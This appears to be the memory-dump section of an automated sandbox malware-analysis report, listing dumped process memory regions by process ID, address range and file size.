memory/1876-159-0x00007FF688E90000-0x00007FF689E6C000-memory.dmpFilesize
15.9MB
-
memory/1876-162-0x00007FF688E90000-0x00007FF689E6C000-memory.dmpFilesize
15.9MB
-
memory/2052-176-0x0000000000000000-mapping.dmp
-
memory/2196-146-0x0000000000000000-mapping.dmp
-
memory/2212-157-0x00007FFFDEF20000-0x00007FFFDF9E1000-memory.dmpFilesize
10.8MB
-
memory/2492-183-0x0000000000000000-mapping.dmp
-
memory/2692-188-0x0000016EF9029000-0x0000016EF902F000-memory.dmpFilesize
24KB
-
memory/2692-187-0x00007FFFDEF20000-0x00007FFFDF9E1000-memory.dmpFilesize
10.8MB
-
memory/2692-177-0x00007FFFDEF20000-0x00007FFFDF9E1000-memory.dmpFilesize
10.8MB
-
memory/3140-132-0x00007FF7413F0000-0x00007FF7423CC000-memory.dmpFilesize
15.9MB
-
memory/3140-152-0x00007FF7413F0000-0x00007FF7423CC000-memory.dmpFilesize
15.9MB
-
memory/3140-135-0x00007FF7413F0000-0x00007FF7423CC000-memory.dmpFilesize
15.9MB
-
memory/3228-189-0x00007FF7546D14E0-mapping.dmp
-
memory/3300-145-0x0000000000000000-mapping.dmp
-
memory/3412-174-0x0000000000000000-mapping.dmp
-
memory/3644-168-0x000001DFC2490000-0x000001DFC24AA000-memory.dmpFilesize
104KB
-
memory/3644-172-0x00007FFFDEF20000-0x00007FFFDF9E1000-memory.dmpFilesize
10.8MB
-
memory/3644-171-0x000001DFC2480000-0x000001DFC248A000-memory.dmpFilesize
40KB
-
memory/3644-170-0x000001DFC2470000-0x000001DFC2476000-memory.dmpFilesize
24KB
-
memory/3644-169-0x000001DFC2440000-0x000001DFC2448000-memory.dmpFilesize
32KB
-
memory/3644-167-0x000001DFC2430000-0x000001DFC243A000-memory.dmpFilesize
40KB
-
memory/3644-163-0x00007FFFDEF20000-0x00007FFFDF9E1000-memory.dmpFilesize
10.8MB
-
memory/3644-164-0x000001DFC2210000-0x000001DFC222C000-memory.dmpFilesize
112KB
-
memory/3644-165-0x000001DFC2200000-0x000001DFC220A000-memory.dmpFilesize
40KB
-
memory/3644-166-0x000001DFC2450000-0x000001DFC246C000-memory.dmpFilesize
112KB
-
memory/3964-153-0x0000000000000000-mapping.dmp
-
memory/4024-186-0x0000000000000000-mapping.dmp
-
memory/4036-190-0x0000000000000000-mapping.dmp
-
memory/4196-151-0x00007FFFDEF20000-0x00007FFFDF9E1000-memory.dmpFilesize
10.8MB
-
memory/4196-150-0x00007FFFDEF20000-0x00007FFFDF9E1000-memory.dmpFilesize
10.8MB
-
memory/4292-181-0x0000000000000000-mapping.dmp
-
memory/4368-182-0x0000000000000000-mapping.dmp
-
memory/4512-149-0x0000000000000000-mapping.dmp
-
memory/4632-137-0x00007FFFDEF20000-0x00007FFFDF9E1000-memory.dmpFilesize
10.8MB
-
memory/4632-136-0x000001965A080000-0x000001965A0A2000-memory.dmpFilesize
136KB
-
memory/4684-142-0x0000000000000000-mapping.dmp
-
memory/4736-143-0x0000000000000000-mapping.dmp
-
memory/4764-141-0x0000000000000000-mapping.dmp
-
memory/4884-180-0x0000000000000000-mapping.dmp
-
memory/4912-144-0x0000000000000000-mapping.dmp
-
memory/5096-184-0x0000000000000000-mapping.dmp